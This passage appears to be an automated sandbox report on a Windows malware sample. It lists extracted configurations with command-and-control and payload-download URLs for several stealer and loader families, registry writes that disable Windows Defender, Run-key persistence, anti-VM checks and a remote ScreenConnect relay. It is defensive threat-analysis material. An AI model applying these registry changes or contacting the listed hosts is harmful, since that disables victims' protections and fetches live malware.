Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
20-02-2025 14:04
Static task
static1
Behavioral task
behavioral1
Sample
3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe
Resource
win10v2004-20250217-en
General
-
Target
3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe
-
Size
2.1MB
-
MD5
c69b7bac11b14128b1b1730e0f9732e9
-
SHA1
02fb9cd3f069cf7ca9f716ef1ce42ff58ba5b230
-
SHA256
3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1
-
SHA512
aa945a199241a72e28f0efd9b2e471505b111aed4fb27dfe146ffec4e309d8495841ceae94e50b139f5a3c559d888d4a7229cb6c6eff780ca9ec7fdd200b7342
-
SSDEEP
24576:gSWtfoYP2LExV94F87p/Z79SBHSA4luPmuNDjwFMh0XpR5c+JEwV2fEh+iTq7Xm4:gSWtuW7byHZ4luPjDjjh0dBSNLwqMyH
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
lumma
https://penetratebatt.pw/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/1524-635-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1524-633-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/1300-328-0x00000000011D0000-0x0000000001642000-memory.dmp healer behavioral1/memory/1300-329-0x00000000011D0000-0x0000000001642000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/3016-417-0x0000000001080000-0x00000000014F8000-memory.dmp family_sectoprat behavioral1/memory/3016-418-0x0000000001080000-0x00000000014F8000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 74caf6e3ae.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 22 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 74caf6e3ae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ meuldlt.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d823df7c9a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d317e9c8c3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ edfeb1d137.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5c9cf0fb93.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1225f1d26c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 05a9811bd3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempU2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ meuldlt.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a18028f754.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 72bd9825d6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ caf15a14e4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 95b5695165.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2c86c1330a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 21 1180 powershell.exe 22 1504 powershell.exe 157 1524 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1180 powershell.exe 1504 powershell.exe 1524 powershell.exe 2664 powershell.exe 1504 powershell.exe 2360 powershell.exe -
Downloads MZ/PE file 30 IoCs
flow pid Process 96 1884 futors.exe 157 1524 powershell.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 18 1976 skotes.exe 18 1976 skotes.exe 18 1976 skotes.exe 18 1976 skotes.exe 18 1976 skotes.exe 35 2476 BitLockerToGo.exe 21 1180 powershell.exe 22 1504 powershell.exe 63 1884 futors.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (91b7d375130f294a)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=dfa6ccbb-66ce-47a7-ac11-ad248ecb2707&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAkc1Mz7s7JUO8wnTLvYVyzwAAAAACAAAAAAAQZgAAAAEAACAAAACQPkj0nXxYrvkOsL9gePfgh05pQA5%2bhKcOoPhPHtyeSgAAAAAOgAAAAAIAACAAAADVc4K3EPVbo4LYgRGSFVjiPqjMFv3tYiYs1Yg4tJiY9aAEAADFYMoi8h5t3LvclIJgJSAV%2fYiGLXTuvx%2be507huUMTmUmY7RLGOYxVNZ8Jw4QbiqReDyHiIYl5Bj612wr9DBqskSKgpgnbtL3E%2fhxlaXlFv271lrcmE7uMvZlLamnDbbNrvkDq1q8M3Bxu2D28nlC8%2bjsEBai4GyTB%2b%2fxslds57vcQPzE%2bT27MFKn%2b6tGezf8M0z%2babhw%2bNZwb4gwRNjoZFuvzBoylaDwzVQDpTP8w7MGjNBkZP10xRQXvjsG%2fMdDSdgSkIIZuWVDDj4otB4fwlUYDmhqgd3RJslQ%2f1%2fWwrlJyzythGEx54QldjO%2fKjnTFEImAZcPqjDWPdPXJgorPE9%2b%2f00JsCwI%2f5MVDbEm63YaJUEOyLu%2bA0hkA6WOFAg05k6KDehPfGfdHzCQIZEh8vabAUFE7qyCmQfxtasjCWOOOCwy9jasHSMOiCI%2bIoCYr8a8SnDqEVmBhZZXFc9w5To%2boVoB88gKMu%2fSyZqIykVif1SdS0E0b6DeEDfog1Cpp%2bRuO4cN7MRKrTujuTxj5wXP6KtgKZuJEJEn15pq90TaQYT%2bm1uQTW61i8dUxu0y2mQdJpwjfvZ76qfa6pPv0Dcg%2fuO%2fohld9pSySJwge6pH%2fEIe3h5XiVDDYoUTxo0jeVG6vVQnd78eLQaWEzyTZuefdsEcaw4tUE4XL0TDV0n7in0myuFKQJY2QBNzk2Lftv2Jn6LMNXSE5qQ4lIZYgOPZqVHDmjKY9AIsgMPUOxyJ7xTitOCEJpev3c6od0RWPaeKDGoI5rAzNEUwmE1l9XZy6Q1x06qFvxIosq6Oth0i3vwqKVX%2f54OvnqG0Otto0PKl2zrqCj9tyFXX%2fH6MdISkj9rUcDWmhs8qeoqgT0iEfBOf7Y%2bVJhvs4pDzXEMbo9OiWpDjwD4aM%2f4cWnmz7bEhjPXg%2fLtLEnhFiK47NdEej4vqe1qlhxYNFro%2fooZXyf5im%2fWd%2fh0nMBmx7OCe%2b1kBsCh1UOAP3rDqJPtAPJgzyQfd%2fXmq6u3AcKTbo5eKji3rIPyZNf4RFqfk22Eqccj0vGQgVpLzYxBIj8B4aSnysri1PoEmQydvrh8551YVKrbTGV9iyk6N4LOfkog7TUoyvyyPXMO3duUDRNfK4vrXn81QM7SOQXyEIa503oBQecbuXQPQ0zDgp7fwF5fZdqEgZ5nYtf3vWkqJZlXboAL7hMqoAz3r5dFpylFdCwZ7Hx%2fQTJyU5FwyTiaJOI8LdQpHsrNDCwsXaLY3mqKDLhb%2f%2b1SRBsk5KH9C8iuK8%2fsIBOQqtWFqdKofOEOqJKqGAd93jgyfR3Xi7mc%2bY7UvjUF9NMGw%2f7iSTvwfd2lhLgC3tiIBbNLw%2fJBokBhpzg4dpeXxW%2fx27gWhT0bTLsT75sTizSlJMAwI%2fGHw8uMlLizYdLyMnfBHtl7zFkPQiepQP16UnLVnT8UMmzQBVg%2fYgzT7%2bMg6Zoh3XjZjEL5b3Gte%2f5Ib6O9KcR4iLLwGe00Or6kEE1anF6KerKj2DZRXvsydpJJZGqb29FZmOk5Z6jJkhCfvuxieXZ1%2fw1OpIsV7pt0r6IGp6Ors5vUWLRvN5GEAAAABcRaoiHLA%2ba0JoBhbZUExtCRAk2zu9DmFILiO7HSswrDPeOFiQX3lZJY%2b9mQlDC%2ffd3%2fJ47MaoyONm8x5BVNdz&c=prequest&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 44 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2c86c1330a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion edfeb1d137.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d317e9c8c3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a18028f754.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion caf15a14e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion caf15a14e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 05a9811bd3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d317e9c8c3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 95b5695165.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5c9cf0fb93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion meuldlt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2c86c1330a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempU2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5c9cf0fb93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 05a9811bd3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 74caf6e3ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 72bd9825d6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 72bd9825d6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion meuldlt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d823df7c9a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 74caf6e3ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempU2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion meuldlt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 95b5695165.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion edfeb1d137.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1225f1d26c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d823df7c9a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1225f1d26c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a18028f754.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion meuldlt.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 54 IoCs
pid Process 1976 skotes.exe 2176 dzvh4HC.exe 1256 NL58452.exe 1760 NL58452.exe 1848 NL58452.exe 696 f3Ypd8O.exe 580 f3Ypd8O.exe 2352 kdMujZh.exe 628 sQ3DZPU.exe 2104 meuldlt.exe 1168 a1EoH8b.exe 1076 MAl7pjE.exe 1580 b95bc460f0.exe 1300 TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE 1160 apisysDirectx.exe 2232 95b5695165.exe 2344 ScreenConnect.ClientService.exe 2572 ScreenConnect.WindowsClient.exe 1748 ScreenConnect.WindowsClient.exe 3016 edfeb1d137.exe 1428 483d2fa8a0d53818306efeb32d3.exe 2240 5c9cf0fb93.exe 2248 amnew.exe 1884 futors.exe 1224 1225f1d26c.exe 1728 DTQCxXZ.exe 2904 7aencsM.exe 1524 7aencsM.exe 2056 dzvh4HC.exe 1464 Bjkm5hE.exe 1472 Bjkm5hE.exe 1144 monthdragon.exe 2524 monthdragon.exe 2236 f3Ypd8O.exe 2948 f3Ypd8O.exe 3240 MAl7pjE.exe 3752 05a9811bd3.exe 2904 NL58452.exe 3084 NL58452.exe 3456 sQ3DZPU.exe 1440 d317e9c8c3.exe 4048 74caf6e3ae.exe 1408 a18028f754.exe 3520 72bd9825d6.exe 3792 meuldlt.exe 3804 apisysDirectx.exe 1972 f2b5b2a0f4.exe 2852 2d9223dc79.exe 3536 2c86c1330a.exe 2432 caf15a14e4.exe 2856 f5719c55e7.exe 2044 31459b3435.exe 3680 TempU2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE 3420 d823df7c9a.exe -
Identifies Wine through registry keys 2 TTPs 22 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 72bd9825d6.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine meuldlt.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine d823df7c9a.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine MAl7pjE.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 05a9811bd3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine a18028f754.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine caf15a14e4.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempU2TEZ23I5J0ZUAYK7HXTUCUFRP5NRAZI.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 95b5695165.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 1225f1d26c.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 2c86c1330a.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine meuldlt.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine edfeb1d137.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine MAl7pjE.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine d317e9c8c3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 74caf6e3ae.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 5c9cf0fb93.exe -
Loads dropped DLL 64 IoCs
pid Process 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 1156 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1256 NL58452.exe 1256 NL58452.exe 2392 WerFault.exe 2392 WerFault.exe 2392 WerFault.exe 2392 WerFault.exe 2392 WerFault.exe 1976 skotes.exe 696 f3Ypd8O.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 2204 MsiExec.exe 920 rundll32.exe 920 rundll32.exe 920 rundll32.exe 920 rundll32.exe 920 rundll32.exe 920 rundll32.exe 920 rundll32.exe 920 rundll32.exe 920 rundll32.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1180 powershell.exe 1180 powershell.exe 628 sQ3DZPU.exe 1976 skotes.exe 1340 MsiExec.exe 3056 MsiExec.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 2344 ScreenConnect.ClientService.exe 1976 skotes.exe 1504 powershell.exe 1504 powershell.exe 1976 skotes.exe 1976 skotes.exe 2248 amnew.exe 3012 WerFault.exe 3012 WerFault.exe 3012 WerFault.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempQ4ABZB21FBRJNNAJWSBP1TZVX8I8LS20.EXE -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\2c86c1330a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089293001\\2c86c1330a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\caf15a14e4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089294001\\caf15a14e4.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\f5719c55e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089295001\\f5719c55e7.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\31459b3435.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089296001\\31459b3435.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\b95bc460f0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089179101\\b95bc460f0.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089180021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\74caf6e3ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009640101\\74caf6e3ae.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\72bd9825d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009650101\\72bd9825d6.exe" futors.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened 